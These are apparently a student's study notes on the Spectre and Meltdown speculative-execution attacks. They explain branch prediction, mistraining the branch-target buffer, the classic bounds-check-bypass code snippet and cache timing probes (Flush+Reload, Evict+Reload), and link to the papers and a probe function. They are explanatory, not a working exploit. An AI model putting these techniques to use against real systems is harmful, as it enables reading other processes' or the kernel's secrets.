-Spectre notes- "Spectre attacks involve inducing a victim to speculatively perform operations that would not occur during correct program execution and which leak the victim’s confidential information via a side channel to the adversary." Meltdown vs. Spectre: - meltdown is the most easily exploitable bug covered by spectre - meltdown relies on intel permission bug that allows us to speculatively read kernel memory from user space - spectre differs in that it usually doesn't rely on reading out-of-bounds memory Modern processors use speculative execution to maximize performance. (E.g. if destination branch depends on memory value that is currently being read.) two that we'll use: - branch prediction: void something(int a) { if (a > 0) doa(); else dob(); } your CPU maintains branch history: - stored in a map called branch history buffer ("BHB") - this branching is called "direct branching" this is a type of speculative execution - branch-target prediction: - jump to location stored in memory address in eax: - jmp [eax] - btb.c example your CPU maintains branch-target history: - stored in a map called branch-target buffer ("BTB") - this branching is called "indirect branching" - IMPORTANT NOTE: BTB is global. So one program can mess with BTB to mess with another's predictions. Spectre attacks are basically done in 3 steps: - locate a sequence of instructions in the process's address space which, when executed, leaks the victim's memory or register contents over a covert channel - covert channel attack: an attack that allows you to transfer information between processes that are not supposed to be able to communicate - trick CPU into speculatively executing this instruction sequence - attacker retrieves info over covert channel. In practice, it can be tricky, b/c you need to: - induce erroneous speculative execution - have a microarchitectural covert channel One simple example of inserting data into covert channel: Exploiting conditional branches: // x is a user-controlled variable if (x < array1_size) y = array2[array1[x] * 256]; If we give an x such that array1[x] is out of bounds, it still reads array2[array1[x] * 256], loading it into cache. Then the attacker can figure out where it was read, and that's how they know the character. (Figure out using some side-channel, like through something called a timing attack: Time addresses near array2, one-by-one. If memory at array2+2560 reads super fast, then you know that array2[10*256] was stored into cache, and thus array1[x] = 10. If we have inputted an x that makes array1[x] point to somewhere in kernel memory, we have now extracted something from kernel memory!!) Another way doesn't even require the victim program to execute the invalid code: - gadget: a machine code snippet found in code of victim - Branch Target Buffer: contains mapping of recently executed branch instructions and where they jumped - attacker: - finds out virtual address of gadget - trains BTB to mispredict an indirect branch to go to gadget - when victim does jump, cpu speculatively jumps to gadget and executes One way to read entire memory exploiting BTB: assume the following common situation: - you have two registers R1, R2 which depend on attacker's input (this is a fairly common scenario) - there is an instruction in memory which adds R1 to R2 - there is an instruction in memory which loads at R2 - assume instructions are adjacent for simplicity now mis-train BTB to mis-predict and jump to R1+R2 => read R2. Leak info through: - BTB via indirect branching - like mis-training BTB to speculatively jump to wrong instruction - Branch history - like mis-training if-else branch history to make it speculate the wrong thing Two simple techniques for extracting from cache covert-channel: Flush+Reload / Evict+Reload. Flush+Reload: Attacker uses clflush to evict cache line, then loads secret information in. Evict+Reload: Attacker fills up cache with other memory locations, then loads secret information in. Breaks security like: - OS process isolation (processes accessing each other's memory) - static analysis (analyzing code) - containerization (programs accessing stuff outside of their container) - other countermeasures that prevent cache timing/side-channel attacks Important mentions: - Spectre can be exploited using Javascript. A proof-of-concept was created which allows JS to read browser's memory. - Return-Oriented Programming is a way to trick CPU into executing many of its own gadgets in a row - via buffer overflow Conclusion: - Many of these are very hard to protect against. - They will likely require large re-design of CPUs. - Hardware and software devs will need to work together to understand what info CPUs are and aren't allowed to leak. Affected hardware: - Intel, AMD, Samsung/Qualcomm (ARM architecture).. --- references --- research: https://meltdownattack.com/meltdown.pdf https://spectreattack.com/spectre.pdf probe function (takes in memory access, times it, sees how long it takes): https://github.com/defuse/flush-reload-attacks/blob/master/flush-reload/myversion/attacktools.h and explanation (page 5): https://eprint.iacr.org/2013/448.pdf vague video explanation of meltdown: https://www.youtube.com/watch?v=I5mRwzVvFGE https://www.youtube.com/watch?v=tdmGFiILNcY